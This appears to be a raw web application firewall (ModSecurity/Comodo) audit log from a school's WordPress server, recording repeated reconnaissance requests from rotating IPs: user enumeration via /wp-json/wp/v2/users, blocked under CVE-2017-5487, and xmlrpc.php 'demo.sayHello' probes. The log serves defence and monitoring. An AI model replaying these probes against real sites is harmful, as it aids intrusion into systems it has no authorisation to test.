userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805088669397 4697 (- - -) Stopwatch2: 1746805088669397 4697; combined=3651, p1=428, p2=3026, p3=23, p4=24, p5=88, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c56c5925-Z-- --3fefcb25-A-- [09/May/2025:22:38:09 +0700] aB4hYR6q_ZMebht3q14k6wAAAIU 103.236.140.4 56848 103.236.140.4 8181 --3fefcb25-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3fefcb25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3fefcb25-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805089651034 2011 (- - -) Stopwatch2: 1746805089651034 2011; combined=1046, p1=347, p2=672, p3=0, p4=0, p5=27, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3fefcb25-Z-- --c985a208-A-- [09/May/2025:22:38:15 +0700] aB4hZx6q_ZMebht3q14k7gAAAJU 103.236.140.4 56854 103.236.140.4 8181 --c985a208-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.115.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.115.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c985a208-C-- demo.sayHello --c985a208-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c985a208-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805095149850 5890 (- - -) Stopwatch2: 1746805095149850 5890; combined=4290, p1=591, p2=3418, p3=35, p4=94, p5=91, sr=84, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c985a208-Z-- --decf996c-A-- [09/May/2025:22:38:21 +0700] aB4hbS-fAO47ojYKsMr5-AAAAEg 103.236.140.4 56860 103.236.140.4 8181 --decf996c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.205 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --decf996c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --decf996c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805101426961 2130 (- - -) Stopwatch2: 1746805101426961 2130; combined=1064, p1=355, p2=683, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --decf996c-Z-- --1dbef81b-A-- [09/May/2025:22:38:28 +0700] aB4hdC-fAO47ojYKsMr5-QAAAEI 103.236.140.4 56864 103.236.140.4 8181 --1dbef81b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.205 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1dbef81b-C-- demo.sayHello --1dbef81b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dbef81b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805108127389 4654 (- - -) Stopwatch2: 1746805108127389 4654; combined=3656, p1=428, p2=3026, p3=27, p4=26, p5=87, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dbef81b-Z-- --bd421a57-A-- [09/May/2025:22:38:37 +0700] aB4hfVoC-7ITMWTA_c9ebQAAANU 103.236.140.4 56868 103.236.140.4 8181 --bd421a57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.165 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bd421a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd421a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805117978094 2887 (- - -) Stopwatch2: 1746805117978094 2887; combined=1311, p1=451, p2=832, p3=0, p4=0, p5=28, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd421a57-Z-- --7444fd20-A-- [09/May/2025:22:38:40 +0700] aB4hgB6q_ZMebht3q14k8wAAAIQ 103.236.140.4 56870 103.236.140.4 8181 --7444fd20-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.111 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7444fd20-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7444fd20-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805120937300 2564 (- - -) Stopwatch2: 1746805120937300 2564; combined=1148, p1=364, p2=752, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7444fd20-Z-- --4841e571-A-- [09/May/2025:22:38:45 +0700] aB4hhVoC-7ITMWTA_c9ecAAAAME 103.236.140.4 56880 103.236.140.4 8181 --4841e571-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.117.165 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.117.165 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4841e571-C-- demo.sayHello --4841e571-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4841e571-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805125703913 5980 (- - -) Stopwatch2: 1746805125703913 5980; combined=4368, p1=617, p2=3522, p3=33, p4=35, p5=96, sr=110, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4841e571-Z-- --7b85ed35-A-- [09/May/2025:22:38:46 +0700] aB4hhh6q_ZMebht3q14k9AAAAJI 103.236.140.4 56884 103.236.140.4 8181 --7b85ed35-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.196.111 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.196.111 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --7b85ed35-C-- demo.sayHello --7b85ed35-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --7b85ed35-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805126676001 4602 (- - -) Stopwatch2: 1746805126676001 4602; combined=3699, p1=466, p2=2931, p3=21, p4=23, p5=142, sr=70, sw=116, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7b85ed35-Z-- --0244640d-A-- [09/May/2025:22:39:04 +0700] aB4hmB6q_ZMebht3q14k9gAAAIg 103.236.140.4 56904 103.236.140.4 8181 --0244640d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --0244640d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0244640d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805144712263 3202 (- - -) Stopwatch2: 1746805144712263 3202; combined=1392, p1=468, p2=893, p3=0, p4=0, p5=31, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0244640d-Z-- --410e2a4f-A-- [09/May/2025:22:39:13 +0700] aB4hoVoC-7ITMWTA_c9eegAAANc 103.236.140.4 56910 103.236.140.4 8181 --410e2a4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.109.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.109.63 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --410e2a4f-C-- demo.sayHello --410e2a4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --410e2a4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805153112735 6002 (- - -) Stopwatch2: 1746805153112735 6002; combined=4336, p1=626, p2=3477, p3=33, p4=36, p5=99, sr=79, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --410e2a4f-Z-- --cdad5c24-A-- [09/May/2025:22:39:13 +0700] aB4hoVoC-7ITMWTA_c9eewAAAMA 103.236.140.4 56912 103.236.140.4 8181 --cdad5c24-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cdad5c24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cdad5c24-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805153452103 2156 (- - -) Stopwatch2: 1746805153452103 2156; combined=1050, p1=351, p2=675, p3=0, p4=0, p5=24, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cdad5c24-Z-- --6172dc12-A-- [09/May/2025:22:39:19 +0700] aB4hp1oC-7ITMWTA_c9efgAAAMY 103.236.140.4 56918 103.236.140.4 8181 --6172dc12-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6172dc12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6172dc12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805159609324 2020 (- - -) Stopwatch2: 1746805159609324 2020; combined=952, p1=326, p2=600, p3=0, p4=0, p5=26, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6172dc12-Z-- --bde6a804-A-- [09/May/2025:22:39:20 +0700] aB4hqFoC-7ITMWTA_c9efwAAAMk 103.236.140.4 56920 103.236.140.4 8181 --bde6a804-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.185.206 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.185.206 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --bde6a804-C-- demo.sayHello --bde6a804-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --bde6a804-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805160620861 4761 (- - -) Stopwatch2: 1746805160620861 4761; combined=3892, p1=437, p2=3119, p3=22, p4=24, p5=158, sr=69, sw=132, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bde6a804-Z-- --76aba72a-A-- [09/May/2025:22:39:26 +0700] aB4hrloC-7ITMWTA_c9egwAAAMQ 103.236.140.4 56928 103.236.140.4 8181 --76aba72a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.35.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.35.178 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --76aba72a-C-- demo.sayHello --76aba72a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --76aba72a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746805166992782 5917 (- - -) Stopwatch2: 1746805166992782 5917; combined=4324, p1=599, p2=3480, p3=33, p4=42, p5=100, sr=82, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --76aba72a-Z-- --de02fa59-A-- [09/May/2025:22:39:36 +0700] aB4huC-fAO47ojYKsMr5_QAAAEk 103.236.140.4 56932 103.236.140.4 8181 --de02fa59-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --de02fa59-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de02fa59-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805176011317 2917 (- - -) Stopwatch2: 1746805176011317 2917; combined=1265, p1=434, p2=801, p3=0, p4=0, p5=30, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de02fa59-Z-- --f2b86c3e-A-- [09/May/2025:22:39:41 +0700] aB4hvVoC-7ITMWTA_c9ehgAAAM4 103.236.140.4 56940 103.236.140.4 8181 --f2b86c3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f2b86c3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2b86c3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746805181674376 2231 (- - -) Stopwatch2: 1746805181674376 2231; combined=982, p1=319, p2=637, p3=0, p4=0, p5=26, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f2b86c3e-Z-- --8e8b5c42-A-- [09/May/2025:22:39:45 +0700] aB4hwVoC-7ITMWTA_c9eiQAAANQ 103.236.140.4 56946 103.236.140.4 8181 --8e8b5c42-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.58.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.58.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8e8b5c42-C-- demo.sayHello 